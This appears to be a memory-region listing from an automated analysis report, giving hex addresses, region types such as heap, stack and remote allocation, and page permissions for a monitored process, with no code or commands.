8D52000
|
heap
|
page read and write
|
||
|
2C7E000
|
stack
|
page read and write
|
||
|
829C000
|
stack
|
page read and write
|
||
|
2A5D000
|
stack
|
page read and write
|
||
|
22C60000
|
unclassified section
|
page execute and read and write
|
||
|
2954000
|
heap
|
page read and write
|
||
|
4C95000
|
trusted library allocation
|
page read and write
|
||
|
7470000
|
trusted library allocation
|
page read and write
|
||
|
73E0000
|
heap
|
page read and write
|
||
|
2DCA000
|
heap
|
page read and write
|
||
|
22F32000
|
heap
|
page read and write
|
||
|
6342000
|
heap
|
page read and write
|
||
|
8677000
|
heap
|
page read and write
|
||
|
8170000
|
trusted library allocation
|
page execute and read and write
|
||
|
723E000
|
stack
|
page read and write
|
||
|
469E000
|
heap
|
page read and write
|
||
|
4640000
|
heap
|
page read and write
|
||
|
227C0000
|
direct allocation
|
page read and write
|
||
|
2289E000
|
stack
|
page read and write
|
||
|
6D5000
|
heap
|
page read and write
|
||
|
4B10000
|
heap
|
page read and write
|
||
|
21BB3D20000
|
trusted library allocation
|
page read and write
|
||
|
6B6E000
|
stack
|
page read and write
|
||
|
84CE000
|
stack
|
page read and write
|
||
|
8676000
|
heap
|
page read and write
|
||
|
4B50000
|
heap
|
page read and write
|
||
|
2CC0000
|
heap
|
page read and write
|
||
|
4655000
|
heap
|
page read and write
|
||
|
2BA8000
|
heap
|
page read and write
|
||
|
64C000
|
stack
|
page read and write
|
||
|
539E000
|
stack
|
page read and write
|
||
|
2BD5000
|
heap
|
page read and write
|
||
|
4648000
|
heap
|
page read and write
|
||
|
4689000
|
heap
|
page read and write
|
||
|
22C91000
|
direct allocation
|
page execute and read and write
|
||
|
2C56000
|
heap
|
page read and write
|
||
|
21BB3E40000
|
trusted library allocation
|
page read and write
|
||
|
2C00000
|
heap
|
page read and write
|
||
|
63D000
|
stack
|
page read and write
|
||
|
8707000
|
heap
|
page read and write
|
||
|
2DCE000
|
stack
|
page read and write
|
||
|
4651000
|
heap
|
page read and write
|
||
|
6B0000
|
direct allocation
|
page read and write
|
||
|
3440000
|
heap
|
page read and write
|
||
|
6327000
|
heap
|
page read and write
|
||
|
2C22000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
2C40000
|
heap
|
page read and write
|
||
|
2DC8000
|
heap
|
page read and write
|
||
|
86AF000
|
heap
|
page read and write
|
||
|
2F54000
|
heap
|
page read and write
|
||
|
82B4000
|
heap
|
page read and write
|
||
|
2C54000
|
heap
|
page read and write
|
||
|
2D30000
|
heap
|
page read and write
|
||
|
6BE0000
|
heap
|
page execute and read and write
|
||
|
6B2E000
|
stack
|
page read and write
|
||
|
2DC0000
|
heap
|
page read and write
|
||
|
2BF5000
|
heap
|
page read and write
|
||
|
6D5000
|
heap
|
page read and write
|
||
|
4651000
|
heap
|
page read and write
|
||
|
2CF8000
|
heap
|
page read and write
|
||
|
29EE000
|
heap
|
page read and write
|
||
|
2B7D000
|
stack
|
page read and write
|
||
|
33FF000
|
stack
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
6F70000
|
heap
|
page read and write
|
||
|
74A0000
|
trusted library allocation
|
page read and write
|
||
|
2311A000
|
heap
|
page read and write
|
||
|
21BAF002000
|
heap
|
page read and write
|
||
|
21BAF11A000
|
heap
|
page read and write
|
||
|
48CE000
|
stack
|
page read and write
|
||
|
28E8000
|
heap
|
page read and write
|
||
|
22C90000
|
direct allocation
|
page read and write
|
||
|
4651000
|
heap
|
page read and write
|
||
|
4677000
|
heap
|
page read and write
|
||
|
2C05000
|
heap
|
page read and write
|
||
|
6327000
|
heap
|
page read and write
|
||
|
2BD8000
|
heap
|
page read and write
|
||
|
4646000
|
heap
|
page read and write
|
||
|
229DE000
|
stack
|
page read and write
|
||
|
7580000
|
trusted library allocation
|
page read and write
|
||
|
2C38000
|
heap
|
page read and write
|
||
|
74F0000
|
trusted library allocation
|
page read and write
|
||
|
464B000
|
heap
|
page read and write
|
||
|
1CE000
|
stack
|
page read and write
|
||
|
6374000
|
heap
|
page read and write
|
||
|
4EEF000
|
trusted library allocation
|
page read and write
|
||
|
4B0E000
|
stack
|
page read and write
|
||
|
4653000
|
heap
|
page read and write
|
||
|
327E000
|
stack
|
page read and write
|
||
|
71FE000
|
stack
|
page read and write
|
||
|
790000
|
heap
|
page read and write
|
||
|
73CB000
|
heap
|
page read and write
|
||
|
230B9000
|
heap
|
page read and write
|
||
|
8090000
|
trusted library allocation
|
page execute and read and write
|
||
|
4D6C777000
|
stack
|
page read and write
|
||
|
4D6DD7D000
|
stack
|
page read and write
|
||
|
4645000
|
heap
|
page read and write
|
||
|
2BB2000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
8707000
|
heap
|
page read and write
|
||
|
2C3E000
|
heap
|
page read and write
|
||
|
2D8E000
|
heap
|
page read and write
|
||
|
2295C000
|
stack
|
page read and write
|
||
|
86F8000
|
heap
|
page read and write
|
||
|
21BAE85C000
|
heap
|
page read and write
|
||
|
23516000
|
unclassified section
|
page execute and read and write
|
||
|
2C0E000
|
heap
|
page read and write
|
||
|
4631000
|
heap
|
page read and write
|
||
|
4639000
|
heap
|
page read and write
|
||
|
4677000
|
heap
|
page read and write
|
||
|
2BBE000
|
heap
|
page read and write
|
||
|
2349D000
|
unclassified section
|
page execute and read and write
|
||
|
2C12000
|
heap
|
page read and write
|
||
|
6F60000
|
heap
|
page read and write
|
||
|
2C5D000
|
heap
|
page read and write
|
||
|
4672000
|
heap
|
page read and write
|
||
|
2D80000
|
heap
|
page read and write
|
||
|
2E8C000
|
stack
|
page read and write
|
||
|
7F960000
|
trusted library allocation
|
page execute and read and write
|
||
|
730000
|
heap
|
page read and write
|
||
|
21BB3C90000
|
trusted library allocation
|
page read and write
|
||
|
4D6DC7E000
|
unkown
|
page readonly
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
559F000
|
remote allocation
|
page execute and read and write
|
||
|
2BA6000
|
heap
|
page read and write
|
||
|
21BB3E5C000
|
heap
|
page read and write
|
||
|
463C000
|
heap
|
page read and write
|
||
|
2C4F000
|
heap
|
page read and write
|
||
|
8678000
|
heap
|
page read and write
|
||
|
21BB3D10000
|
trusted library allocation
|
page read and write
|
||
|
828E000
|
stack
|
page read and write
|
||
|
2C08000
|
heap
|
page read and write
|
||
|
46EE000
|
stack
|
page read and write
|
||
|
4C10000
|
heap
|
page read and write
|
||
|
68C000
|
stack
|
page read and write
|
||
|
2EFD000
|
stack
|
page read and write
|
||
|
8636000
|
heap
|
page read and write
|
||
|
29E9000
|
heap
|
page read and write
|
||
|
4675000
|
heap
|
page read and write
|
||
|
3010000
|
heap
|
page read and write
|
||
|
2C40000
|
heap
|
page read and write
|
||
|
463C000
|
heap
|
page read and write
|
||
|
2CF0000
|
heap
|
page read and write
|
||
|
7373000
|
heap
|
page read and write
|
||
|
4680000
|
heap
|
page read and write
|
||
|
4F80000
|
trusted library allocation
|
page read and write
|
||
|
31FA000
|
heap
|
page read and write
|
||
|
8600000
|
trusted library allocation
|
page read and write
|
||
|
2A2F000
|
unkown
|
page read and write
|
||
|
463C000
|
heap
|
page read and write
|
||
|
2AB0000
|
heap
|
page read and write
|
||
|
2C57000
|
heap
|
page read and write
|
||
|
8540000
|
trusted library allocation
|
page read and write
|
||
|
650000
|
direct allocation
|
page read and write
|
||
|
4653000
|
heap
|
page read and write
|
||
|
2D40000
|
trusted library allocation
|
page read and write
|
||
|
8610000
|
heap
|
page read and write
|
||
|
6D4000
|
heap
|
page read and write
|
||
|
22570000
|
heap
|
page read and write
|
||
|
7347000
|
trusted library allocation
|
page read and write
|
||
|
8050000
|
trusted library allocation
|
page execute and read and write
|
||
|
84EE000
|
stack
|
page read and write
|
||
|
4B30000
|
heap
|
page read and write
|
||
|
2C2B000
|
heap
|
page read and write
|
||
|
8D50000
|
heap
|
page read and write
|
||
|
21BAF10C000
|
heap
|
page read and write
|
||
|
4651000
|
heap
|
page read and write
|
||
|
29EE000
|
stack
|
page read and write
|
||
|
5981000
|
trusted library allocation
|
page read and write
|
||
|
7107000
|
trusted library allocation
|
page read and write
|
||
|
2DF4000
|
heap
|
page read and write
|
||
|
21BAF11B000
|
heap
|
page read and write
|
||
|
463C000
|
heap
|
page read and write
|
||
|
4649000
|
heap
|
page read and write
|
||
|
21BB3CE4000
|
trusted library allocation
|
page read and write
|
||
|
7381000
|
heap
|
page read and write
|
||
|
21BAF8D0000
|
trusted library section
|
page readonly
|
||
|
81D0000
|
trusted library allocation
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
86F8000
|
heap
|
page read and write
|
||
|
48CB000
|
trusted library allocation
|
page read and write
|
||
|
4ED0000
|
heap
|
page read and write
|
||
|
2C11000
|
heap
|
page read and write
|
||
|
80C0000
|
trusted library allocation
|
page read and write
|
||
|
230B9000
|
heap
|
page read and write
|
||
|
21BAF890000
|
trusted library section
|
page readonly
|
||
|
74FE000
|
stack
|
page read and write
|
||
|
8D53000
|
heap
|
page read and write
|
||
|
21BB3E60000
|
heap
|
page read and write
|
||
|
4F80000
|
trusted library allocation
|
page read and write
|
||
|
4B60000
|
heap
|
page read and write
|
||
|
29EA000
|
heap
|
page read and write
|
||
|
640000
|
heap
|
page readonly
|
||
|
7F70000
|
trusted library allocation
|
page execute and read and write
|
||
|
2280E000
|
stack
|
page read and write
|
||
|
7340000
|
heap
|
page read and write
|
||
|
7460000
|
trusted library allocation
|
page read and write
|
||
|
2BFC000
|
heap
|
page read and write
|
||
|
2C25000
|
trusted library allocation
|
page execute and read and write
|
||
|
6345000
|
heap
|
page read and write
|
||
|
3170000
|
heap
|
page read and write
|
||
|
B250000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
464A000
|
heap
|
page read and write
|
||
|
21BAE88C000
|
heap
|
page read and write
|
||
|
2C13000
|
heap
|
page read and write
|
||
|
29AE000
|
stack
|
page read and write
|
||
|
22D31000
|
heap
|
page read and write
|
||
|
73C4000
|
heap
|
page read and write
|
||
|
8DD7000
|
heap
|
page read and write
|
||
|
2C40000
|
trusted library allocation
|
page read and write
|
||
|
6300000
|
heap
|
page read and write
|
||
|
8675000
|
heap
|
page read and write
|
||
|
2D50000
|
heap
|
page read and write
|
||
|
21BB3F02000
|
heap
|
page read and write
|
||
|
4631000
|
heap
|
page read and write
|
||
|
4F80000
|
trusted library allocation
|
page read and write
|
||
|
22DAA000
|
heap
|
page read and write
|
||
|
790000
|
heap
|
page read and write
|
||
|
22CA6000
|
direct allocation
|
page execute and read and write
|
||
|
4FB1000
|
heap
|
page read and write
|
||
|
2DE0000
|
heap
|
page read and write
|
||
|
4D6CE79000
|
stack
|
page read and write
|
||
|
86A7000
|
heap
|
page read and write
|
||
|
2D15000
|
heap
|
page read and write
|
||
|
21BAE8B0000
|
heap
|
page read and write
|
||
|
224AD000
|
stack
|
page read and write
|
||
|
4F80000
|
heap
|
page read and write
|
||
|
21BAE8FF000
|
heap
|
page read and write
|
||
|
21BB3CC0000
|
trusted library allocation
|
page read and write
|
||
|
22C2E000
|
stack
|
page read and write
|
||
|
2C4F000
|
heap
|
page read and write
|
||
|
2C00000
|
heap
|
page read and write
|
||
|
7373000
|
heap
|
page read and write
|
||
|
6CFE000
|
stack
|
page read and write
|
||
|
2BBE000
|
heap
|
page read and write
|
||
|
4E7F000
|
stack
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
2BFE000
|
heap
|
page read and write
|
||
|
8672000
|
heap
|
page read and write
|
||
|
AC66000
|
direct allocation
|
page execute and read and write
|
||
|
464D000
|
heap
|
page read and write
|
||
|
2F57000
|
heap
|
page read and write
|
||
|
464E000
|
heap
|
page read and write
|
||
|
4F80000
|
trusted library allocation
|
page read and write
|
||
|
2BA8000
|
heap
|
page read and write
|
||
|
815E000
|
stack
|
page read and write
|
||
|
7185000
|
heap
|
page read and write
|
||
|
6332000
|
heap
|
page read and write
|
||
|
700000
|
heap
|
page read and write
|
||
|
6342000
|
heap
|
page read and write
|
||
|
8708000
|
heap
|
page read and write
|
||
|
2BB4000
|
heap
|
page read and write
|
||
|
8620000
|
direct allocation
|
page read and write
|
||
|
8560000
|
trusted library allocation
|
page read and write
|
||
|
21BAE87C000
|
heap
|
page read and write
|
||
|
2BE6000
|
heap
|
page read and write
|
||
|
49E0000
|
trusted library allocation
|
page read and write
|
||
|
53DE000
|
stack
|
page read and write
|
||
|
4771000
|
trusted library allocation
|
page read and write
|
||
|
2BD8000
|
heap
|
page read and write
|
||
|
4D6DA7D000
|
stack
|
page read and write
|
||
|
74B5000
|
trusted library allocation
|
page read and write
|
||
|
2B92000
|
heap
|
page read and write
|
||
|
713F000
|
heap
|
page read and write
|
||
|
632C000
|
heap
|
page read and write
|
||
|
226DE000
|
stack
|
page read and write
|
||
|
21BB3CE0000
|
trusted library allocation
|
page read and write
|
||
|
8610000
|
direct allocation
|
page read and write
|
||
|
2BFC000
|
heap
|
page read and write
|
||
|
4677000
|
heap
|
page read and write
|
||
|
6337000
|
heap
|
page read and write
|
||
|
6C9000
|
stack
|
page read and write
|
||
|
45C000
|
system
|
page execute and read and write
|
||
|
8070000
|
trusted library allocation
|
page read and write
|
||
|
8D8B000
|
heap
|
page read and write
|
||
|
4D6E67E000
|
unkown
|
page readonly
|
||
|
4870000
|
heap
|
page execute and read and write
|
||
|
21BB3EC6000
|
heap
|
page read and write
|
||
|
75DB000
|
stack
|
page read and write
|
||
|
7231000
|
heap
|
page read and write
|
||
|
633E000
|
heap
|
page read and write
|
||
|
75BD000
|
stack
|
page read and write
|
||
|
2C30000
|
heap
|
page read and write
|
||
|
76D000
|
stack
|
page read and write
|
||
|
66B000
|
stack
|
page read and write
|
||
|
4B70000
|
heap
|
page read and write
|
||
|
757E000
|
stack
|
page read and write
|
||
|
2C23000
|
heap
|
page read and write
|
||
|
634C000
|
heap
|
page read and write
|
||
|
5771000
|
trusted library allocation
|
page read and write
|
||
|
4638000
|
heap
|
page read and write
|
||
|
21BAE873000
|
heap
|
page read and write
|
||
|
7439000
|
heap
|
page read and write
|
||
|
4D6D77E000
|
unkown
|
page readonly
|
||
|
3040000
|
heap
|
page read and write
|
||
|
4D6E5FE000
|
stack
|
page read and write
|
||
|
82E4000
|
heap
|
page read and write
|
||
|
880F000
|
stack
|
page read and write
|
||
|
4630000
|
heap
|
page read and write
|
||
|
632A000
|
heap
|
page read and write
|
||
|
2BED000
|
heap
|
page read and write
|
||
|
6332000
|
heap
|
page read and write
|
||
|
4610000
|
heap
|
page read and write
|
||
|
5914000
|
trusted library allocation
|
page read and write
|
||
|
2954000
|
heap
|
page read and write
|
||
|
72F8000
|
heap
|
page read and write
|
||
|
21BAE828000
|
heap
|
page read and write
|
||
|
22DA9000
|
heap
|
page read and write
|
||
|
2BFC000
|
heap
|
page read and write
|
||
|
2D11000
|
heap
|
page read and write
|
||
|
463C000
|
heap
|
page read and write
|
||
|
70DF000
|
stack
|
page read and write
|
||
|
7373000
|
heap
|
page read and write
|
||
|
21BB3E00000
|
heap
|
page read and write
|
||
|
7550000
|
trusted library allocation
|
page read and write
|
||
|
21BB3E30000
|
heap
|
page read and write
|
||
|
6D4000
|
heap
|
page read and write
|
||
|
4A55000
|
heap
|
page read and write
|
||
|
21BAF8B0000
|
trusted library section
|
page readonly
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
484E000
|
stack
|
page read and write
|
||
|
21BAE700000
|
heap
|
page read and write
|
||
|
23041000
|
heap
|
page read and write
|
||
|
2C2E000
|
unkown
|
page read and write
|
||
|
2BE2000
|
heap
|
page read and write
|
||
|
2B60000
|
heap
|
page read and write
|
||
|
2C02000
|
heap
|
page read and write
|
||
|
2C02000
|
heap
|
page read and write
|
||
|
54DE000
|
stack
|
page read and write
|
||
|
2CFD000
|
trusted library allocation
|
page execute and read and write
|
||
|
2954000
|
heap
|
page read and write
|
||
|
6CE0000
|
direct allocation
|
page read and write
|
||
|
2BF7000
|
heap
|
page read and write
|
||
|
4651000
|
heap
|
page read and write
|
||
|
2C20000
|
trusted library allocation
|
page read and write
|
||
|
2351C000
|
unclassified section
|
page execute and read and write
|
||
|
6D4000
|
heap
|
page read and write
|
||
|
6D4000
|
heap
|
page read and write
|
||
|
811E000
|
stack
|
page read and write
|
||
|
2E0E000
|
stack
|
page read and write
|
||
|
5F9F000
|
remote allocation
|
page execute and read and write
|
||
|
4647000
|
heap
|
page read and write
|
||
|
667000
|
heap
|
page read and write
|
||
|
8890000
|
trusted library allocation
|
page read and write
|
||
|
75D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
6CC0000
|
direct allocation
|
page read and write
|
||
|
21BAF540000
|
trusted library allocation
|
page read and write
|
||
|
2C07000
|
heap
|
page read and write
|
||
|
2CFF000
|
stack
|
page read and write
|
||
|
633B000
|
heap
|
page read and write
|
||
|
8707000
|
heap
|
page read and write
|
||
|
700000
|
heap
|
page read and write
|
||
|
21BAE8A2000
|
heap
|
page read and write
|
||
|
6D5000
|
heap
|
page read and write
|
||
|
21BB3DC0000
|
trusted library allocation
|
page read and write
|
||
|
2954000
|
heap
|
page read and write
|
||
|
7440000
|
trusted library allocation
|
page read and write
|
||
|
4631000
|
heap
|
page read and write
|
||
|
4631000
|
heap
|
page read and write
|
||
|
3BF6000
|
remote allocation
|
page execute and read and write
|
||
|
8688000
|
heap
|
page read and write
|
||
|
7395000
|
trusted library allocation
|
page read and write
|
||
|
8674000
|
heap
|
page read and write
|
||
|
4F02000
|
trusted library allocation
|
page read and write
|
||
|
710000
|
heap
|
page readonly
|
||
|
78F000
|
stack
|
page read and write
|
||
|
5F9F000
|
stack
|
page read and write
|
||
|
7146000
|
heap
|
page read and write
|
||
|
747A000
|
trusted library allocation
|
page read and write
|
||
|
2C0E000
|
heap
|
page read and write
|
||
|
2F61000
|
heap
|
page read and write
|
||
|
8DFF000
|
heap
|
page read and write
|
||
|
2C22000
|
heap
|
page read and write
|
||
|
2D09000
|
trusted library allocation
|
page read and write
|
||
|
4647000
|
heap
|
page read and write
|
||
|
6D4000
|
heap
|
page read and write
|
||
|
682000
|
stack
|
page read and write
|
||
|
4D6E07E000
|
unkown
|
page readonly
|
||
|
2D90000
|
trusted library allocation
|
page execute and read and write
|
||
|
8D30000
|
direct allocation
|
page execute and read and write
|
||
|
6D4000
|
heap
|
page read and write
|
||
|
6D80000
|
direct allocation
|
page read and write
|
||
|
790000
|
heap
|
page read and write
|
||
|
632F000
|
heap
|
page read and write
|
||
|
22A5B000
|
stack
|
page read and write
|
||
|
4643000
|
heap
|
page read and write
|
||
|
6331000
|
heap
|
page read and write
|
||
|
5900000
|
trusted library allocation
|
page read and write
|
||
|
7350000
|
trusted library allocation
|
page read and write
|
||
|
633B000
|
heap
|
page read and write
|
||
|
6395000
|
heap
|
page read and write
|
||
|
4647000
|
heap
|
page read and write
|
||
|
21BAFC21000
|
trusted library allocation
|
page read and write
|
||
|
299E000
|
stack
|
page read and write
|
||
|
8DC8000
|
heap
|
page read and write
|
||
|
2C05000
|
heap
|
page read and write
|
||
|
6C90000
|
direct allocation
|
page read and write
|
||
|
4631000
|
heap
|
page read and write
|
||
|
743E000
|
heap
|
page read and write
|
||
|
72D0000
|
heap
|
page read and write
|
||
|
230EA000
|
heap
|
page read and write
|
||
|
2B30000
|
heap
|
page read and write
|
||
|
4F80000
|
trusted library allocation
|
page read and write
|
||
|
4651000
|
heap
|
page read and write
|
||
|
7F80000
|
trusted library allocation
|
page read and write
|
||
|
2C22000
|
heap
|
page read and write
|
||
|
8060000
|
trusted library allocation
|
page read and write
|
||
|
8DD6000
|
heap
|
page read and write
|
||
|
6DCF000
|
stack
|
page read and write
|
||
|
2B00000
|
trusted library allocation
|
page read and write
|
||
|
4677000
|
heap
|
page read and write
|
||
|
29EA000
|
heap
|
page read and write
|
||
|
2C22000
|
heap
|
page read and write
|
||
|
2C26000
|
heap
|
page read and write
|
||
|
4631000
|
heap
|
page read and write
|
||
|
2D70000
|
heap
|
page read and write
|
||
|
4639000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
8DBD000
|
heap
|
page read and write
|
||
|
2C0E000
|
heap
|
page read and write
|
||
|
7510000
|
trusted library allocation
|
page read and write
|
||
|
2B10000
|
trusted library allocation
|
page read and write
|
||
|
2ECB000
|
stack
|
page read and write
|
||
|
4CAF000
|
trusted library allocation
|
page read and write
|
||
|
4D6D67E000
|
unkown
|
page readonly
|
||
|
2954000
|
heap
|
page read and write
|
||
|
2BFC000
|
heap
|
page read and write
|
||
|
6334000
|
heap
|
page read and write
|
||
|
2C44000
|
heap
|
page read and write
|
||
|
86AF000
|
heap
|
page read and write
|
||
|
4EE2000
|
trusted library allocation
|
page read and write
|
||
|
2C05000
|
heap
|
page read and write
|
||
|
46F1000
|
heap
|
page read and write
|
||
|
21BB3D10000
|
trusted library allocation
|
page read and write
|
||
|
906D000
|
stack
|
page read and write
|
||
|
2F2E000
|
stack
|
page read and write
|
||
|
6312000
|
heap
|
page read and write
|
||
|
2D20000
|
trusted library allocation
|
page read and write
|
||
|
73D1000
|
heap
|
page read and write
|
||
|
27A7000
|
stack
|
page read and write
|
||
|
6AEE000
|
stack
|
page read and write
|
||
|
8D5A000
|
heap
|
page read and write
|
||
|
4D6D07C000
|
stack
|
page read and write
|
||
|
2C1F000
|
heap
|
page read and write
|
||
|
21BAEFA0000
|
trusted library section
|
page read and write
|
||
|
2DB4000
|
heap
|
page read and write
|
||
|
2954000
|
heap
|
page read and write
|
||
|
740000
|
direct allocation
|
page read and write
|
||
|
2C0E000
|
heap
|
page read and write
|
||
|
419F000
|
remote allocation
|
page execute and read and write
|
||
|
2BF2000
|
heap
|
page read and write
|
||
|
8DBD000
|
heap
|
page read and write
|
||
|
825E000
|
stack
|
page read and write
|
||
|
472E000
|
stack
|
page read and write
|
||
|
2BED000
|
heap
|
page read and write
|
||
|
71A8000
|
heap
|
page read and write
|
||
|
21BB3E63000
|
heap
|
page read and write
|
||
|
86F8000
|
heap
|
page read and write
|
||
|
2FBF000
|
unkown
|
page read and write
|
||
|
666000
|
stack
|
page read and write
|
||
|
2CFF000
|
stack
|
page read and write
|
||
|
21BAE88E000
|
heap
|
page read and write
|
||
|
2DC5000
|
heap
|
page read and write
|
||
|
85BE000
|
stack
|
page read and write
|
||
|
465E000
|
heap
|
page read and write
|
||
|
501E000
|
trusted library allocation
|
page read and write
|
||
|
21BAF880000
|
trusted library section
|
page readonly
|
||
|
463C000
|
heap
|
page read and write
|
||
|
23041000
|
heap
|
page read and write
|
||
|
21BB4080000
|
remote allocation
|
page read and write
|
||
|
21BAEE90000
|
trusted library allocation
|
page read and write
|
||
|
8D8B000
|
heap
|
page read and write
|
||
|
2271F000
|
stack
|
page read and write
|
||
|
86B3000
|
heap
|
page read and write
|
||
|
4646000
|
heap
|
page read and write
|
||
|
86A7000
|
heap
|
page read and write
|
||
|
22ADC000
|
stack
|
page read and write
|
||
|
8DBD000
|
heap
|
page read and write
|
||
|
4D6D27B000
|
stack
|
page read and write
|
||
|
344C000
|
heap
|
page read and write
|
||
|
4D6CB7E000
|
unkown
|
page readonly
|
||
|
633B000
|
heap
|
page read and write
|
||
|
29C0000
|
trusted library section
|
page read and write
|
||
|
21BB4080000
|
remote allocation
|
page read and write
|
||
|
2BD8000
|
heap
|
page read and write
|
||
|
820C000
|
stack
|
page read and write
|
||
|
6345000
|
heap
|
page read and write
|
||
|
21BB3E51000
|
heap
|
page read and write
|
||
|
4641000
|
heap
|
page read and write
|
||
|
7393000
|
heap
|
page read and write
|
||
|
2CF0000
|
trusted library allocation
|
page read and write
|
||
|
2C02000
|
heap
|
page read and write
|
||
|
2269D000
|
stack
|
page read and write
|
||
|
2D60000
|
heap
|
page read and write
|
||
|
46F0000
|
heap
|
page read and write
|
||
|
3126000
|
heap
|
page read and write
|
||
|
29E4000
|
trusted library allocation
|
page read and write
|
||
|
2C1A000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD000
|
stack
|
page read and write
|
||
|
234C0000
|
unclassified section
|
page execute and read and write
|
||
|
86A7000
|
heap
|
page read and write
|
||
|
31EE000
|
stack
|
page read and write
|
||
|
6345000
|
heap
|
page read and write
|
||
|
86AF000
|
heap
|
page read and write
|
||
|
4677000
|
heap
|
page read and write
|
||
|
7252000
|
heap
|
page read and write
|
||
|
3020000
|
heap
|
page read and write
|
||
|
466B000
|
heap
|
page read and write
|
||
|
AC92000
|
trusted library allocation
|
page read and write
|
||
|
8160000
|
heap
|
page read and write
|
||
|
21BAE813000
|
heap
|
page read and write
|
||
|
86A4000
|
heap
|
page read and write
|
||
|
4D6D57E000
|
unkown
|
page readonly
|
||
|
2BFC000
|
heap
|
page read and write
|
||
|
4630000
|
heap
|
page read and write
|
||
|
740000
|
heap
|
page readonly
|
||
|
6354000
|
heap
|
page read and write
|
||
|
4D6D37E000
|
unkown
|
page readonly
|
||
|
82A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
21BAE720000
|
heap
|
page read and write
|
||
|
4672000
|
heap
|
page read and write
|
||
|
633E000
|
heap
|
page read and write
|
||
|
6340000
|
heap
|
page read and write
|
||
|
2BD8000
|
heap
|
page read and write
|
||
|
6BE5000
|
heap
|
page execute and read and write
|
||
|
4664000
|
heap
|
page read and write
|
||
|
86AF000
|
heap
|
page read and write
|
||
|
2DFB000
|
heap
|
page read and write
|
||
|
490F000
|
stack
|
page read and write
|
||
|
21BB3D53000
|
trusted library allocation
|
page read and write
|
||
|
2D80000
|
heap
|
page read and write
|
||
|
4631000
|
heap
|
page read and write
|
||
|
74E0000
|
trusted library allocation
|
page read and write
|
||
|
660000
|
heap
|
page read and write
|
||
|
21BB3F0A000
|
heap
|
page read and write
|
||
|
2C00000
|
heap
|
page read and write
|
||
|
469E000
|
heap
|
page read and write
|
||
|
21BB3E23000
|
heap
|
page read and write
|
||
|
21BAF11A000
|
heap
|
page read and write
|
||
|
2DF0000
|
heap
|
page read and write
|
||
|
2265D000
|
stack
|
page read and write
|
||
|
770000
|
heap
|
page read and write
|
||
|
6D4000
|
heap
|
page read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
302D000
|
heap
|
page read and write
|
||
|
4C11000
|
heap
|
page read and write
|
||
|
680000
|
direct allocation
|
page read and write
|
||
|
2246E000
|
stack
|
page read and write
|
||
|
86A3000
|
heap
|
page read and write
|
||
|
2D10000
|
heap
|
page read and write
|
||
|
2BF2000
|
heap
|
page read and write
|
||
|
720C000
|
heap
|
page read and write
|
||
|
46AE000
|
stack
|
page read and write
|
||
|
858C000
|
stack
|
page read and write
|
||
|
4885000
|
heap
|
page execute and read and write
|
||
|
2D7C000
|
stack
|
page read and write
|
||
|
2D5F000
|
unkown
|
page read and write
|
||
|
2B7E000
|
heap
|
page read and write
|
||
|
73A7000
|
heap
|
page read and write
|
||
|
6D70000
|
direct allocation
|
page read and write
|
||
|
7610000
|
trusted library allocation
|
page read and write
|
||
|
2BE0000
|
heap
|
page read and write
|
||
|
2BEE000
|
heap
|
page read and write
|
||
|
6D5000
|
heap
|
page read and write
|
||
|
22B5C000
|
stack
|
page read and write
|
||
|
4645000
|
heap
|
page read and write
|
||
|
4D6D4FE000
|
stack
|
page read and write
|
||
|
73D000
|
stack
|
page read and write
|
||
|
7467000
|
trusted library allocation
|
page read and write
|
||
|
463C000
|
heap
|
page read and write
|
||
|
469E000
|
heap
|
page read and write
|
||
|
2C22000
|
heap
|
page read and write
|
||
|
86AF000
|
heap
|
page read and write
|
||
|
7670000
|
trusted library allocation
|
page read and write
|
||
|
2BF7000
|
heap
|
page read and write
|
||
|
770000
|
direct allocation
|
page read and write
|
||
|
8D8E000
|
heap
|
page read and write
|
||
|
4647000
|
heap
|
page read and write
|
||
|
2C0E000
|
heap
|
page read and write
|
||
|
21BB3EFC000
|
heap
|
page read and write
|
||
|
86F1000
|
heap
|
page read and write
|
||
|
6D4000
|
heap
|
page read and write
|
||
|
2DC0000
|
heap
|
page read and write
|
||
|
82D0000
|
heap
|
page read and write
|
||
|
780000
|
heap
|
page read and write
|
||
|
4F74000
|
trusted library allocation
|
page read and write
|
||
|
86A7000
|
heap
|
page read and write
|
||
|
812C000
|
stack
|
page read and write
|
||
|
7560000
|
trusted library allocation
|
page read and write
|
||
|
743C000
|
heap
|
page read and write
|
||
|
2B68000
|
heap
|
page read and write
|
||
|
292E000
|
stack
|
page read and write
|
||
|
2C02000
|
heap
|
page read and write
|
||
|
76A0000
|
trusted library allocation
|
page read and write
|
||
|
22560000
|
direct allocation
|
page read and write
|
||
|
2C00000
|
trusted library allocation
|
page read and write
|
||
|
A266000
|
direct allocation
|
page execute and read and write
|
||
|
4B31000
|
heap
|
page read and write
|
||
|
2BEE000
|
heap
|
page read and write
|
||
|
465E000
|
heap
|
page read and write
|
||
|
2C22000
|
heap
|
page read and write
|
||
|
7124000
|
heap
|
page read and write
|
||
|
81B0000
|
trusted library allocation
|
page read and write
|
||
|
86A7000
|
heap
|
page read and write
|
||
|
22BA0000
|
heap
|
page read and write
|
||
|
41B000
|
system
|
page execute and read and write
|
||
|
4C6F000
|
stack
|
page read and write
|
||
|
2D1D000
|
stack
|
page read and write
|
||
|
21BB3D00000
|
trusted library allocation
|
page read and write
|
||
|
4645000
|
heap
|
page read and write
|
||
|
292E000
|
unkown
|
page read and write
|
||
|
3008000
|
heap
|
page read and write
|
||
|
4F81000
|
heap
|
page read and write
|
||
|
2990000
|
heap
|
page read and write
|
||
|
312A000
|
heap
|
page read and write
|
||
|
730000
|
direct allocation
|
page read and write
|
||
|
6F50000
|
heap
|
page read and write
|
||
|
234B3000
|
unclassified section
|
page execute and read and write
|
||
|
